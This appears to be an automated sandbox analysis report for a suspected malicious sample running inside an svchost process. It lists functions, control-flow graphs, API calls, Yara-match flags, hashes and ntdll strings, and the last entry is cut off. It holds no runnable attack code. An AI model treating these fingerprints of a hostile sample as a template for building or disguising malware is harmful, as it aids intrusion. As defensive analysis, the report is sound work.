                                                                                                                  • Opcode Fuzzy Hash: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
                                                                                                                  • Instruction Fuzzy Hash: 4590027120150813D112B2584544787000A87D0745FD6C412A042C59CD97568B52A121
                                                                                                                  Function 00414128 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97threadwindowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 182 414128-41413a 183 414168-4141dd call 42e893 call 42f2a3 call 417903 call 4048e3 call 424fa3 182->183 184 41413c-414154 182->184 202 4141fd-414203 183->202 203 4141df-4141ee PostThreadMessageW 183->203 185 414156-414167 184->185 186 4140e9-4140f1 184->186 189 4140f6 186->189 189->189 191 4140f8-414154 189->191 191->185 191->186 203->202 204 4141f0-4141fa 203->204 204->202
                                                                                                                  APIs
                                                                                                                  • PostThreadMessageW.USER32(f3663-3k,00000111,00000000,00000000), ref: 004141EA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostThread
                                                                                                                  • String ID: f3663-3k$f3663-3k
                                                                                                                  • API String ID: 1836367815-2354389040
                                                                                                                  • Opcode ID: 47312413de178957428d925b024ec15ed4e39c45a3154b119c275579456fc2a9
                                                                                                                  • Instruction ID: 57b80eca45ddfb112378365bc78925cdd0f091db6c467c713822f1da91ed0ddf
                                                                                                                  • Opcode Fuzzy Hash: 47312413de178957428d925b024ec15ed4e39c45a3154b119c275579456fc2a9
                                                                                                                  • Instruction Fuzzy Hash: 89216A72D4421D7BE710D6959C82DFFBBACDF813A4F4041AAFD08B3240D6284E0A87E5
                                                                                                                  Function 00414173 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 205 414173-4141dd call 42e893 call 42f2a3 call 417903 call 4048e3 call 424fa3 216 4141fd-414203 205->216 217 4141df-4141ee PostThreadMessageW 205->217 217->216 218 4141f0-4141fa 217->218 218->216
                                                                                                                  APIs
                                                                                                                  • PostThreadMessageW.USER32(f3663-3k,00000111,00000000,00000000), ref: 004141EA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostThread
                                                                                                                  • String ID: f3663-3k$f3663-3k
                                                                                                                  • API String ID: 1836367815-2354389040
                                                                                                                  • Opcode ID: 1b6dd2371718b4a0b8c46f5a51aec603c5353fed8517a1ee872ff57ce09fc1d7
                                                                                                                  • Instruction ID: cbdef109c2b9b07798291e43b3e3ae66cf79e94bce95d6dec6f2eff81f21801d
                                                                                                                  • Opcode Fuzzy Hash: 1b6dd2371718b4a0b8c46f5a51aec603c5353fed8517a1ee872ff57ce09fc1d7
                                                                                                                  • Instruction Fuzzy Hash: 3301E1B2D0011C7AEB00AAE19C82DEF7B7CDB81398F408069BA1467240D6684E0A47F1
                                                                                                                  Function 00414204 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 219 414204-41420d 220 4141b6-4141bb 219->220 221 41420f-414219 219->221 227 4141c1-4141dd 220->227 228 4141bc call 424fa3 220->228 223 41421b-41421f 221->223 225 414221-414226 223->225 226 41423d-414243 223->226 225->226 229 414228-41422d 225->229 226->223 230 414245-414248 226->230 231 4141fd-414203 227->231 232 4141df-4141ee PostThreadMessageW 227->232 228->227 229->226 233 41422f-414236 229->233 232->231 234 4141f0-4141fa 232->234 235 414249-41424c 233->235 236 414238-41423b 233->236 234->231 236->226 236->235
                                                                                                                  APIs
                                                                                                                  • PostThreadMessageW.USER32(f3663-3k,00000111,00000000,00000000), ref: 004141EA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostThread
                                                                                                                  • String ID: f3663-3k$f3663-3k
                                                                                                                  • API String ID: 1836367815-2354389040
                                                                                                                  • Opcode ID: 87b90ca90d2aef138502aba0da3305d66568e9920b47b088628ceb59326d936e
                                                                                                                  • Instruction ID: 77328fe590cc0aeeb2a76a46f2bb0c730a7ded943ba59cd829b5b86977ee54ce
                                                                                                                  • Opcode Fuzzy Hash: 87b90ca90d2aef138502aba0da3305d66568e9920b47b088628ceb59326d936e
                                                                                                                  • Instruction Fuzzy Hash: 5A115C7191424839DB304AB44C91CEB7B7CDACA3A4B4843DAF95487391C3398CC78755
                                                                                                                  Function 0042CA83 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 237 42ca83-42cac7 call 404973 call 42d963 RtlFreeHeap
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CAC2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeHeap
                                                                                                                  • String ID: GfA
                                                                                                                  • API String ID: 3298025750-3102277488
                                                                                                                  • Opcode ID: fee22c70c48bf49024c0c7ee0c89e9249b1d52017c9b24d8fec10191ff4b523f
                                                                                                                  • Instruction ID: 5cbfc12d9832714acbc2873c89cf4bc191619a9535280a7325d26089e5f3cd42
                                                                                                                  • Opcode Fuzzy Hash: fee22c70c48bf49024c0c7ee0c89e9249b1d52017c9b24d8fec10191ff4b523f
                                                                                                                  • Instruction Fuzzy Hash: ABE06DB12002057BC610EE99DC41E9B37ACDFC8710F40441AF908A7242CA75B910C7B8
                                                                                                                  Function 004178F7 Relevance: 1.6, APIs: 1, Instructions: 70libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 409 4178f7-4178f9 410 417897 409->410 411 4178fb 409->411 414 41789a-4178a1 410->414 412 41794a-417961 call 42de73 411->412 413 4178fd 411->413 424 417963-417971 412->424 425 41797a-41797d 412->425 413->412 414->414 416 4178a3-4178a6 414->416 418 4178a8-4178ad 416->418 419 4178bc-4178cd call 417623 416->419 420 4178b3-4178ba 418->420 426 4178f2-4178f5 419->426 427 4178cf-4178d3 419->427 420->419 420->420 428 417973-417977 LdrLoadDll 424->428 429 4178d6-4178dd 427->429 428->425 429->429 430 4178df-4178e2 429->430 430->426 431 4178e4-4178e6 430->431 432 4178e9-4178f0 431->432 432->426 432->432
                                                                                                                  APIs
                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417975
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Load
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2234796835-0
                                                                                                                  • Opcode ID: 2ef6c9470a1ee21cb33d2bb9bdb88f05293757dec9739a761deb81b3b822c429
                                                                                                                  • Instruction ID: 5a5dfc79b01cc52691c3650746e7fedc7cc37b96ebd393a04756661f1823cbed
                                                                                                                  • Opcode Fuzzy Hash: 2ef6c9470a1ee21cb33d2bb9bdb88f05293757dec9739a761deb81b3b822c429
                                                                                                                  • Instruction Fuzzy Hash: 75113A31D0C1865EEB11EB18D898BFDBB71EF56208F0801DBE8888B253E926998CC755
                                                                                                                  Function 004179B1 Relevance: 1.6, APIs: 1, Instructions: 63libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 433 4179b1 434 4179b5-4179c6 433->434 435 417973-417977 LdrLoadDll 434->435 436 4179c8-4179d5 434->436 438 41797a-41797d 435->438 439 4179d7-4179da 436->439 439->439 440 4179dc-4179dd 439->440 440->434 441 4179df 440->441 442 417961 441->442 443 4179e1-4179e7 441->443 442->438 444 417963-417971 442->444 445 4179e9-417a05 443->445 444->435 447 417a07-417a54 445->447 448 417a7a-417a8b call 42f553 445->448 447->445 456 417a56-417a61 447->456 453 417a8d-417abe call 42f553 call 42b713 448->453 454 417abf-417adf call 42b713 448->454
                                                                                                                  APIs
                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417975
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Load
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2234796835-0
                                                                                                                  • Opcode ID: f88cb81a74db75b46b352572e01ae66e1a7b29122a00a59ca399e53127685873
                                                                                                                  • Instruction ID: aa99d62753baf914b96a6fe2fb545f555e00b53280b927957bec337b59d5ec07
                                                                                                                  • Opcode Fuzzy Hash: f88cb81a74db75b46b352572e01ae66e1a7b29122a00a59ca399e53127685873
                                                                                                                  • Instruction Fuzzy Hash: 4A114C75554105AFDB10CE68C8C6ADD7B70FF12314F248396D816DB582C335958BC685
                                                                                                                  Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 479 42ca33-42ca74 call 404973 call 42d963 RtlAllocateHeap
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(?,?,?), ref: 0042CA6F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 599ca950bc8f169c71cba67ae82da6feebaca764728b68fca45a6d3234b8bbdf
                                                                                                                  • Instruction ID: eeebabae217029cdcc264359d531b3e72f878c51ecf9e81678dbc4f9f50571ff
                                                                                                                  • Opcode Fuzzy Hash: 599ca950bc8f169c71cba67ae82da6feebaca764728b68fca45a6d3234b8bbdf
                                                                                                                  • Instruction Fuzzy Hash: 9DE06DB22002057BC614EE59DC41EDB73ADDFC5714F00402AFA08A7241DA71B911CBB8
                                                                                                                  Function 0042CAD3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 489 42cad3-42cb0f call 404973 call 42d963 ExitProcess
                                                                                                                  APIs
                                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,0B993897,?,?,0B993897), ref: 0042CB0A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 621844428-0
                                                                                                                  • Opcode ID: 15d7165cc788577510ac71ca48b0bcbc26da289298ee6bd827b7d81804111150
                                                                                                                  • Instruction ID: 8e5617cf027397ce6c886203216bd8e952ae4f09c2aac6b337be60386c44fe0d
                                                                                                                  • Opcode Fuzzy Hash: 15d7165cc788577510ac71ca48b0bcbc26da289298ee6bd827b7d81804111150
                                                                                                                  • Instruction Fuzzy Hash: 2FE04F71200215BBD620BA6AEC41F9B775CDFC5714F00402AFA0967241C6B0B90087F4
                                                                                                                  Function 03C72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 494 3c72c0a-3c72c0f 495 3c72c11-3c72c18 494->495 496 3c72c1f-3c72c26 LdrInitializeThunk 494->496
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
                                                                                                                  • Instruction ID: 84faa90233bd227a4f600780950a8624567ebc6a859d33608038aac95c8ba62c
                                                                                                                  • Opcode Fuzzy Hash: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
                                                                                                                  • Instruction Fuzzy Hash: 73B09BB19015C5C5EA11F7604608757790567D0745F5AC461D303C685E4739C2D1E175

                                                                                                                  Non-executed Functions

                                                                                                                  Function 03CB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-2160512332
                                                                                                                  • Opcode ID: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
                                                                                                                  • Instruction ID: aeea6575664b303b0d03bbeb9d9d32d519b3d40015c05f24726aacc197937762
                                                                                                                  • Opcode Fuzzy Hash: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
                                                                                                                  • Instruction Fuzzy Hash: E0928A75608381AFD720DE25C884BABB7F8BB88754F084D2DFA95DB250D770E944CB92
                                                                                                                  Function 03C268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                  • API String ID: 0-3089669407
                                                                                                                  • Opcode ID: f0b0b3b2124a67d30191e30d4c985eb85e128119bee2b4c3c945b5e594545fbc
                                                                                                                  • Instruction ID: d588cd32f61ebcebc7f05e536a58118ac9464702c7f9479a09029d78cee04501
                                                                                                                  • Opcode Fuzzy Hash: f0b0b3b2124a67d30191e30d4c985eb85e128119bee2b4c3c945b5e594545fbc
                                                                                                                  • Instruction Fuzzy Hash: 878102B7D012186F8B61FBA9EDD4EEEB7BDAB15610B054421B910FB114E730EE149BA0
                                                                                                                  Function 03C68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  • 8, xrefs: 03CA52E3
                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 03CA5543
                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03CA54E2
                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03CA540A, 03CA5496, 03CA5519
                                                                                                                  • Address of the debug info found in the active list., xrefs: 03CA54AE, 03CA54FA
                                                                                                                  • Critical section debug info address, xrefs: 03CA541F, 03CA552E
                                                                                                                  • Invalid debug info address of this critical section, xrefs: 03CA54B6
                                                                                                                  • undeleted critical section in freed memory, xrefs: 03CA542B
                                                                                                                  • Critical section address., xrefs: 03CA5502
                                                                                                                  • double initialized or corrupted critical section, xrefs: 03CA5508
                                                                                                                  • Critical section address, xrefs: 03CA5425, 03CA54BC, 03CA5534
                                                                                                                  • corrupted critical section, xrefs: 03CA54C2
                                                                                                                  • Thread identifier, xrefs: 03CA553A
                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03CA54CE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                  • API String ID: 0-2368682639
                                                                                                                  • Opcode ID: 1612f316f5d6c5ca7b8da948fbab3d4a7a6b2d06a003f33d730e9fc0e128b216
                                                                                                                  • Instruction ID: 456954ea4f0dd25a3cbfbfd52409b9d8384888699ab45794b852c49c2c047e6f
                                                                                                                  • Opcode Fuzzy Hash: 1612f316f5d6c5ca7b8da948fbab3d4a7a6b2d06a003f33d730e9fc0e128b216
                                                                                                                  • Instruction Fuzzy Hash: 5481D0B1A00759EFDB60CF99C844BAEBBB9FB0A704F548169F514FB241D371A940EB60
                                                                                                                  Function 03C60F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                  • API String ID: 0-360209818
                                                                                                                  • Opcode ID: 64b5ff52d93c276132cabac26c0ae2b4e33db46889f9b67e54d234a6c3c567d8
                                                                                                                  • Instruction ID: f0a406c1a77317f2a9fa110da154a49533f6ec074b94398c4abf49b7417cf60d
                                                                                                                  • Opcode Fuzzy Hash: 64b5ff52d93c276132cabac26c0ae2b4e33db46889f9b67e54d234a6c3c567d8
                                                                                                                  • Instruction Fuzzy Hash: 40629EB5E0062A8FDB24CF19C8817A9B7B6EF95324F5D82DAD449EB240D7325AD1CF40
                                                                                                                  Function 03CE12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                  • API String ID: 0-3591852110
                                                                                                                  • Opcode ID: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
                                                                                                                  • Instruction ID: 9d7dce24789fb40ff977518bff5a74f094d714bea92837fdc4a33fbe62415a4c
                                                                                                                  • Opcode Fuzzy Hash: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
                                                                                                                  • Instruction Fuzzy Hash: 1712C9756046829FC725DF29C440BBABBF5EF09704F0D8459E496CF682D738E9A0DB50
                                                                                                                  Function 03C4AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                  • API String ID: 0-3197712848
                                                                                                                  • Opcode ID: 91b51e84e04cbc1c1f3161e6bbccb384ea242484c0d4018e4965aea5ab0109e8
                                                                                                                  • Instruction ID: 0b0734e5c73153479c2bd55b09ad55b38121e054f148dc18df8cd6ed864b99f0
                                                                                                                  • Opcode Fuzzy Hash: 91b51e84e04cbc1c1f3161e6bbccb384ea242484c0d4018e4965aea5ab0109e8
                                                                                                                  • Instruction Fuzzy Hash: F512D0B5A083418FE724DF28C844BAAB7E4FF95704F09095AF985CF291E774DA44CB92
                                                                                                                  Function 03C2D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                  • API String ID: 0-3532704233
                                                                                                                  • Opcode ID: 474648e7b9e6e471f576550b34da2389b892e15d7c7e8e36fc944c59ba8f6a52
                                                                                                                  • Instruction ID: 0f740e15b3622867d23963a33acda5f9c426cec1905d1b5820c944a0b7c0678c
                                                                                                                  • Opcode Fuzzy Hash: 474648e7b9e6e471f576550b34da2389b892e15d7c7e8e36fc944c59ba8f6a52
                                                                                                                  • Instruction Fuzzy Hash: 1DB1BFB65083619FC711EF24C484B6BBBE8AF98744F054D2EF89ADB240D770DA44CB92
                                                                                                                  Function 03CE0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                  • API String ID: 0-1357697941
                                                                                                                  • Opcode ID: a87246f26af38fe3f0541ec659cae006ac0a4ae8bdea3abd8373c415b5d9af29
                                                                                                                  • Instruction ID: 3b88b63462c6dc64b6b04823535882c25e339b61c75c4c5f2c59a91c93b5650f
                                                                                                                  • Opcode Fuzzy Hash: a87246f26af38fe3f0541ec659cae006ac0a4ae8bdea3abd8373c415b5d9af29
                                                                                                                  • Instruction Fuzzy Hash: DBF11575A047A5EFCB25DF6AC441BAAFBF5FF09700F088069E481DB242C774AA45DB90
                                                                                                                  Function 03CC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                  • API String ID: 0-3063724069
                                                                                                                  • Opcode ID: d1419ac550a98ae106eb328be6077173285bf57649ba18f2e218414a7689ba6c
                                                                                                                  • Instruction ID: 7aeef9516231f1dd5a75fb4b70d58783c071b4a3d51c8eb3b11ffe59b4fa0bda
                                                                                                                  • Opcode Fuzzy Hash: d1419ac550a98ae106eb328be6077173285bf57649ba18f2e218414a7689ba6c
                                                                                                                  • Instruction Fuzzy Hash: 8DD104B2814391AFD721DB64C844BAFF7F8AF84714F094A2DFA84DB250D770CA449B92
                                                                                                                  Function 03CE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000009.00000002.1670896674.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_9_2_3c00000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                  • API String ID: 0-1700792311
                                                                                                                  • Opcode ID: 8d95b49c85618eb2b177c53d5fc1d0be8710e1ed0688fddcce46fed617a1230c
